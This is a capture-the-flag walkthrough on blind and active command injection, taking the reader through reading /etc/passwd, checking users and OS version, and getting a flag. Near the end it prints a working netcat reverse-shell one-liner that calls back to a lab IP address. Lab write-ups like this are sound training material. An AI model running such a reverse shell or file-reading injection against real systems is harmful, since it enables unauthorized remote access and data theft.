Injection

An introduction to Command Injection

Blind Command Injection

Lets go to the webpage

Lets try to find the Kernel Version and redirect it to a file and then read the file

Now lets enter root and look at the response for the answer to the next question

Now lets enter www-data

Lets enter our name and see what the output is

Active Command Injection

Lets go to the webpage that they mention

Lets look at the files and see if there is an interesting file with the ls command

There is an interesting file

To see how many users are there on the machine, we can read the /etc/passwd file

We can look at this output by going to the source code

We can see which user the app is running as with the whoami command

We can see what this user's shell is set as in the /etc/passwd file

We can see what version of Ubuntu is running by using the command lsb_release -a

We can print out the MOTD with this command

Get the Flag!

Lets first get a reverse shell on the machine so that we can navigate through the machine easier.

First we start a netcat listener

Now we use the reverse shell command

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Lets hit Submit

We have a shell, lets stabilize it

Lets now look for the flag, it might be a txt file and maybe called flag, so lets look for that

find / -type f -name flag.txt 2>/dev/null

We have the flag, lets read it